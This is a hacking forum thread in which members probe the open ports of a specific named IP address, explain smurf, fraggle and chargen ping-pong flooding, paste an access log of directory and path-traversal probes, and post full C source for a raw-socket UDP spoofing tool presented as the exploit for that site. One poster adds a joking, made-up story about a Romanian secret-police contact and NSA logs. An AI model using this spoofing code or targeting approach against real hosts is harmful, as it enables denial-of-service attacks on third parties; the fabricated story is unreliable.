please help i am anew hacker

No explicit questions like "how do I hack xxx.com" please!
User avatar
FrankB
Ph. D. in Sucko'logics
Ph. D. in Sucko'logics
Posts: 315
Joined: 06 Mar 2006, 17:00
14
Location: Belgistahn
Contact:

Post by FrankB »

Lyecdevf wrote: 212.76.251.82 :13 - daytime -- open
Damn.. its surely not a night shop.

Wonder wonder. ..hmm...

--
FrankB

User avatar
Lyecdevf
cyber Idi Amin
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
14
Location: In between life and death.
Contact:

Post by Lyecdevf »

Since you are wondering I went off to collect some data on these uncomon open ports. What I found verified to me that this is a very easilly hackable site.

Port 11 systat
systat (TCP)
On some UNIX machines, creating a TCP connection to this port will dump the active processes and who launched them. The original intent for this was to make remote management of UNIX easier. However, intruders will query the systat information in order to map out the system.
This service is rarely available anymore because of these security concerns.
On UNIX, there are also local commands that show this information, such as systat or ps.

Port 7 echo
echo (UDP, TCP)
This simple port just echoes whatever is sent to it. This feature can be used in many attacks, such as fraggle.

Fraggle:

Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on that subnet respond to this broadcast. By spoofing the source IP address of the packet, all the responses will get sent to the spoofed IP address. Thus, a hacker can often flood a victim with hundreds of responses for every request the hacker sends out.
There is not much the victim can do, because the incoming link is being overloaded. However, the victim does known the subnet number of the amplifier, and should contact the owner to tell them to turn off amplification (i.e. enable filtering of ICMP Echoes).
IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses, they will appear to come from all over the Internet.
On IRCs, hackers will use bots (automated programs) that connect to IRC servers and gather a victim's IP address. The bots then send the forged packets to the amplifiers to inundate the victim.
The owner of the amplifier is also a victim in this attack. They can easily defend against the attack by filtering the incoming broadcasts.
The hacker is able to saturate the links and gateways leading to the inundated victim, thus no firewall can really protect the victim. The only real defense is to trace back to the amplifiers and contact those system administrators.
The attack is named "smurf" after a popular program that generates the attack.
Fraggle, a variant uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to pingpong attack, and should be turned off.

Port 13 daytime
daytime (TCP, UDP)
Responds with the current time of day. The protocol specification doesn't clearly define the format of the data returned, so every machine responds in a slightly different format. This can be used to fingerprint machines.


Port 15 netstat

Port 19 chargen

chargen - generates a stream of characters (TCP) or a packet containing characters (UDP). See Simple Services for more information.
The 'chargen' service should only be enabled when testing the machine.
When contacted, chargen responds with some random text (something like all the characters in the alphabet in row). When contacted via UDP, it will respond with a single UDP packet. When contacted via TCP, it will continue spewing characters until the client closes the connection.
An easy attack is 'pingpong' which IP spoofs a packet between two machines running chargen. They will commence spewing characters at each other, slowing the machines down and saturating the network.
On UNIX, chargen should be disabled in '/etc/inetd.conf"
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
Disable these by simply inserting a hash character as the first character on the line:
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
On Windows, go to the Networking Control Panel and make sure that "Simple TCP Services" is disabled. None of these simple services are needed for anything but testing, but are extremely dangerous.

Port 37 time

Port 111 Sun RPC Portmapper

User avatar
FrankB
Ph. D. in Sucko'logics
Ph. D. in Sucko'logics
Posts: 315
Joined: 06 Mar 2006, 17:00
14
Location: Belgistahn
Contact:

Post by FrankB »

Kewl, poast Lyecdevf !
Even Nmap does not know what port 11 returns :

Code: Select all

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port11-TCP:V=4.01%I=7%D=5/7%Time=445DF6E4%P=i686-pc-linux-gnu%r(NULL,10
SF:4C,"Warning:\x20bad\x20syntax,
And maybe that is exactly what the convenient store holder at 212.76.251.82 wants bots to be fed with.

Maybe the convenient store guy out there is even NOT in production mode !
(i mean, his million dinars cash register is on another machine ?)

Wow, what now ?

Maybe he/she also wants bots and sockets to be returned a genuine fraud fac-simile og the `thing' they are looking for, which is called 'masquerading'.

Cute, no?

On the other hand, i contacted a former colleage of mine who worked for the Roumanian STASI, as for re-integration in society. He being on probation at that time, ex cyber criminal, convicted and sentenced as 'on parole', working thus for the ex-Roumanian state-police, he still has an active account on a mainframe in .. Croatia, that works hand in hand withe the NSA, yup :-)

He returned me a list by FAX what has been logged on that machine by quering the PASSTHROUGH and IPTABLE rotation for yestarday on several of the LAN-switches on the overall UUNEt backbone and that very IP-address has been severly beastially hack-probed yesterday by vandals.
The LOG file goes :

Code: Select all

69.81.139.197 - - [06/May/2006:18:31:38 +0200] "GET /*/pub/LBG_sig.jpg HTTP/1.1" 304 - "http://www.suck-oold.com/modules.php?name=Forums&file=viewtopic&t=719&postdays=0&postorder=asc&start=0" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET / HTTP/1.0" 200 2843 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET /aeo HTTP/1.0" 404 197 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:58 +0200] "GET /cgi-win/ HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /cgibin/qsammtx HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /cgiwin/ HTTP/1.0" 404 201 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:32:59 +0200] "GET /scripts/ HTTP/1.0" 404 202 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_private/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /cgi-win/bkl HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_vti_pvt/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:00 +0200] "GET /_vti_cnf/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /cgi-win/bqq HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /_vti_bin/ HTTP/1.0" 404 203 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /_vti_cnf/htuzu HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:01 +0200] "GET /bin/ HTTP/1.0" 404 198 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:41 +0200] "GET /_vti_bin/jqysr HTTP/1.0" 404 208 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:41 +0200] "GET //%2E%2E%2E%2E%2E%2E/aaaaaa/../c%6Fnf%69g%2Esys HTTP/1.0" 404 212 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:42 +0200] "GET /cgi/pubkyfc HTTP/1.0" 404 205 "-" "Mozilla/4.0 (compatible)"
68.248.45.189 - - [06/May/2006:18:33:42 +0200] "GET //cg%69-b%69n/aaaaaa/../p%61ssw%6Frds/./%75s%65rs%2Ehtx HTTP/1.0" 404 222 "-" "Mozilla/4.0 (compatible)"
.. and soforth..

Now, *someones* from suck-o.com wanted to get really beasty on that poor guy.
Luckily, all the bestiality was mere probes as my friend said and he told me that all those IP numbers are now logged 'by accident' for the next Nigerian-scam list and better put some conrete in their firewalls because the PINGBACK might hurt.

(Roumanians never laugh with that kind of situation)

A message to the admin of this froum though, in Roumanian :

Bad_Brain : , nyy guvf vf n cenax, srry serr gb qryrgr zl cbfg, v vf hfryrff ohg shaal, rkprcg gur YBT, gung vf trahvar naq gehr :-))"

I don't think *he* is joking.
--
FrankB

User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
14
Location: Michigan USA
Contact:

what?!

Post by DNR »

:?
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.

LBG

Re: what?!

Post by LBG »

DNR wrote::?
Do you get "it"? LOL

User avatar
Lyecdevf
cyber Idi Amin
cyber Idi Amin
Posts: 1222
Joined: 16 Mar 2006, 17:00
14
Location: In between life and death.
Contact:

Post by Lyecdevf »

I think that the following would be the exploit for this site. It is written I believe for the open ports in our example.

I my self can not use it. If I was to assume that it was written in Perl I must note that I have not mangaed to get the neccerasy sortware on my computer to use it. As I understand you need to download Apache, Perl, and if you do not want to issue commands from command promt for the Perl to execute the desirable codes than you need some thing else as well.

*/

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <errno.h>

struct sockaddr addrfrom;
struct sockaddr addrto;
int s;
u_char outpack[65536];
struct iphdr *ip;
struct udphdr *udp;



main(int argc, char **argv) {
struct sockaddr_in *from;
struct sockaddr_in *to;
struct protoent *proto;
int i;
char *src,*dest;
int srcp, destp;
int packetsize,datasize;


fprintf(stderr,"PingPong 1.0 - 970621 by Willy Tarreau <tarreau@aemiaif.ibp.fr>\n");
fprintf(stderr,"<<< PLEASE USE THIS FOR TESTS ONLY AND WITH ADMINISTRATORS' AUTHORIZATION >>>\n\n");
if (argc!=5) {
fprintf(stderr,"wrong arg count.\nUsage: pingpong src_addr src_port dst_addr dst_port\n");
fprintf(stderr,"src_addr and dst_addr must be given as IP addresses (212.76.251.82)\n");
fprintf(stderr,"Note that it often works with 127.0.0.1 as src_addr !\n");
exit(2);
}
src=argv[1];
srcp=atoi(argv[2]);
dest=argv[3];
destp=atoi(argv[4]);

if (!(proto = getprotobyname("raw"))) {
perror("getprotobyname(raw)");
exit(2);
}
/* "raw" should be 255 */
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) {
perror("socket");
exit(2);
}

memset(&addrfrom, 0, sizeof(struct sockaddr));
from = (struct sockaddr_in *)&addrfrom;
from->sin_family = AF_INET;
from->sin_port=htons(srcp);
if (!inet_aton(src, &from->sin_addr)) {
fprintf(stderr,"Incorrect address for 'from': %s\n",src);
exit(2);
}

memset(&addrto, 0, sizeof(struct sockaddr));
to = (struct sockaddr_in *)&addrto;
to->sin_family = AF_INET;
to->sin_port=htons(destp);
if (!inet_aton(dest, &to->sin_addr)) {
fprintf(stderr,"Incorrect address for 'to': %s\n",dest);
exit(2);
}

packetsize=0;

/* lets's build a complete UDP packet from scratch */

ip=(struct iphdr *)outpack;
ip->version=4; /* IPv4 */
ip->ihl=5; /* 5 words IP header */
ip->tos=0;
ip->id=0;
ip->frag_off=0;
ip->ttl=0x40;
if (!(proto = getprotobyname("udp"))) {
perror("getprotobyname(udp)");
exit(2);
}
/* "udp" should be 17 */
ip->protocol=proto->p_proto; /* udp */
ip->check=0; /* null checksum, will be automatically computed by the kernel */
ip->saddr=from->sin_addr.s_addr;
ip->daddr=to->sin_addr.s_addr;
/* end of ip header */
packetsize+=ip->ihl<<2;
/* udp header */
udp=(struct udphdr *)((int)outpack + (int)(ip->ihl<<2));
udp->source=htons(srcp);
udp->dest=htons(destp);
udp->check=0; /* ignore checksum */
packetsize+=sizeof(struct udphdr);
/* end of udp header */
/* add udp data here if you like */
for (datasize=0;datasize<8;datasize++) {
outpack[packetsize+datasize]='A'+datasize;
}
packetsize+=datasize;
udp->len=htons(sizeof(struct udphdr)+datasize);
ip->tot_len=htons(packetsize);
if (sendto(s, (char *)outpack, packetsize, 0, &addrto, sizeof(struct sockaddr))==-1) {
perror("sendto");
exit(2);
}
printf("packet sent !\n");
close(s);
printf("end\n");
exit(0);
}

User avatar
Nerdz
The Architect
The Architect
Posts: 1127
Joined: 15 Jun 2005, 16:00
15
Location: #db_error in: select usr.location from sucko_member where usr.id=63;
Contact:

Post by Nerdz »

FrankB wrote: (Roumanians never laugh with that kind of situation)

A message to the admin of this froum though, in Roumanian :

Bad_Brain : , nyy guvf vf n cenax, srry serr gb qryrgr zl cbfg, v vf hfryrff ohg shaal, rkprcg gur YBT, gung vf trahvar naq gehr :-))"

I don't think *he* is joking.
--
FrankB
If I understand, someone from here have tried to hack the guy and he's in trouble?

And what is the stuff in Roumanian?
Give a man a fish, you feed him for one day.
Learn a man to fish, you feed him for life.

LBG

Post by LBG »

nerdzoncrack wrote:
If I understand, someone from here have tried to hack the guy and he's in trouble?

And what is the stuff in Roumanian?
nerdz, if I could pm you, I would ;) ;)

LBG

nerdz

Post by LBG »

Si vous êtes curieux, email j'à laplifom@gmail.com. Je ne peux pas vraiment le dire comme je veux ici, ainsi si vous voulez des détails, holla lol

User avatar
Gogeta70
^_^
^_^
Posts: 3247
Joined: 25 Jun 2005, 16:00
15

Post by Gogeta70 »

Umm... what's with the french?
¯\_(ツ)_/¯ It works on my machine...

User avatar
FrankB
Ph. D. in Sucko'logics
Ph. D. in Sucko'logics
Posts: 315
Joined: 06 Mar 2006, 17:00
14
Location: Belgistahn
Contact:

Post by FrankB »

Lyecdevf wrote:I think that the following would be the exploit for this site. It is written I believe for the open ports in our example.
Not exactly, it is written in 1998 by a college professor and it fits for Netware and eventually Linux kernels <2 .. in internal networks. Now, with some 'IP-spoofing', maybe, but still, we are in 2006 and many systems have Syn-flooding protected by default or by a firewall.

In our example, as you say, IP_MASQUERADING is done twice : once by its ISP and yet another time on the Network servers of that very ISP (that is in the UK).

The firewall kernel masquerades outgoing packets and demasquerades the incoming packets. The masquerading and demasquerading is done in the function ip_forward. The function ip_fw_masquerade is called for forwarded packets and the function ip_fw_demasquerade is called for 'backward'ed packets.
Lyecdevf wrote: As I understand you need to download Apache, Perl[...]

No, It is written in plain old C and the very interesting snippet of code is based on common UNIX C libraries..

All you need is a compliant C compiler and all the other header files if you'd run it on a Windows machine .. on which you'd have to compile it again with a compliant compiler.
That is a long dance, since the code is more UNIX native and quite ages, chances are that you might have to rewrite it for modern C language on Windows.

Interesting snippet though. I like archives and old `things' :-)

-- FrankB
Ook!Ook!

PLeXroD
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 146
Joined: 25 Oct 2005, 16:00
15
Location: Denmark
Contact:

Post by PLeXroD »

Nice ! :P
-Never try to be uncommon, instead of that only realize it's you that is common...-

-In grater common sence Linux is better than MS Windows-

-Never try to hack platform, instead of that, only make security and teach other to do that to-

Post Reply